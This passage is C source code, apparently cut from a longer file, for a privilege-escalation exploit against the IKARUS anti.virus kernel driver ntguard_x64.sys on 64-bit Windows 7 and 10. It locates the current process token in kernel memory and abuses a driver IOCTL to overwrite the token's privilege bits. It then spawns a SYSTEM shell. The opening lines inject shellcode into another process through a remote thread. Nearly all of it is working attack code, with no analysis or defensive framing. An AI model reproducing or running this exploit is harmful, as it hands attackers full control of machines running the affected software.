if (!(WriteProcessMemory(hProcess, (LPVOID)ptrtomem, shellcode, sizeof(shellcode), NULL)))
{
printf("\n[-] Unable to write to process memory\n\n");
return -1;
}
printf("\n[+] Written to allocated process memory");
if ((hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)ptrtomem, NULL, 0, NULL)) == NULL)
{
CloseHandle(hThread);
printf("\n[-] Unable to create remote thread\n\n");
return -1;
}
printf("\n[+] Created remote thread and executed\n\n");
return 0;
}
QWORD TokenAddressCurrentProcess(HANDLE hProcess, DWORD MyProcessID)
{
_NtQuerySystemInformation NtQuerySystemInformation;
PSYSTEM_HANDLE_INFORMATION pSysHandleInfo;
ULONG i;
PSYSTEM_HANDLE pHandle;
QWORD TokenAddress = 0;
DWORD nSize = 4096;
DWORD nReturn;
BOOL tProcess;
HANDLE hToken;
if ((tProcess = OpenProcessToken(hProcess, TOKEN_QUERY, &hToken)) == FALSE)
{
printf("\n[-] OpenProcessToken() failed (%d)\n", GetLastError());
return -1;
}
NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation");
if (!NtQuerySystemInformation)
{
printf("[-] Unable to resolve NtQuerySystemInformation\n\n");
return -1;
}
do
{
nSize += 4096;
pSysHandleInfo = (PSYSTEM_HANDLE_INFORMATION) HeapAlloc(GetProcessHeap(), 0, nSize);
} while (NtQuerySystemInformation(SystemHandleInformation, pSysHandleInfo, nSize, &nReturn) == STATUS_INFO_LENGTH_MISMATCH);
printf("\n[i] Current process id %d and token handle value %u", MyProcessID, hToken);
for (i = 0; i < pSysHandleInfo->NumberOfHandles; i++)
{
if (pSysHandleInfo->Handles[i].ProcessId == MyProcessID && pSysHandleInfo->Handles[i].Handle == hToken)
{
TokenAddress = pSysHandleInfo->Handles[i].Object;
}
}
HeapFree(GetProcessHeap(), 0, pSysHandleInfo);
return TokenAddress;
}
int main(int argc, char *argv[])
{
QWORD TokenAddressTarget;
QWORD SepPrivilegesOffset = 0x40;
QWORD PresentByteOffset;
QWORD EnableByteOffset;
QWORD TokenAddress;
HANDLE hDevice;
char devhandle[MAX_PATH];
DWORD dwRetBytes = 0;
printf("-------------------------------------------------------------------------------\n");
printf(" IKARUS anti.virus (ntguard_x64.sys) Arbitrary Write EoP Exploit \n");
printf(" Tested on 64bit Windows 7 / Windows 10 (1709) \n");
printf("-------------------------------------------------------------------------------\n");
TokenAddress = TokenAddressCurrentProcess(GetCurrentProcess(), GetCurrentProcessId());
printf("\n[i] Address of current process token 0x%p", TokenAddress);
TokenAddressTarget = TokenAddress + SepPrivilegesOffset;
printf("\n[i] Address of _SEP_TOKEN_PRIVILEGES 0x%p will be overwritten\n", TokenAddressTarget);
PresentByteOffset = TokenAddressTarget + 0x2;
printf("[i] Present bits at 0x%p will be overwritten with 0x11\n", PresentByteOffset);
EnableByteOffset = TokenAddressTarget + 0xa;
printf("[i] Enabled bits at 0x%p will be overwritten with 0x11", EnableByteOffset);
sprintf(devhandle, "\\\\.\\%s", "ntguard");
hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
if(hDevice == INVALID_HANDLE_VALUE)
{
printf("\n[-] Open %s device failed\n\n", devhandle);
return -1;
}
else
{
printf("\n[+] Open %s device successful", devhandle);
}
printf("\n[~] Press any key to continue . . .\n");
getch();
DeviceIoControl(hDevice, 0x8300000c, NULL, 0, (LPVOID)PresentByteOffset, 0, &dwRetBytes, NULL);
DeviceIoControl(hDevice, 0x8300000c, NULL, 0, (LPVOID)EnableByteOffset, 0, &dwRetBytes, NULL);
printf("[+] Overwritten _SEP_TOKEN_PRIVILEGES bits\n");
CloseHandle(hDevice);
printf("[*] Spawning SYSTEM Shell");
spawnShell();
return 0;
}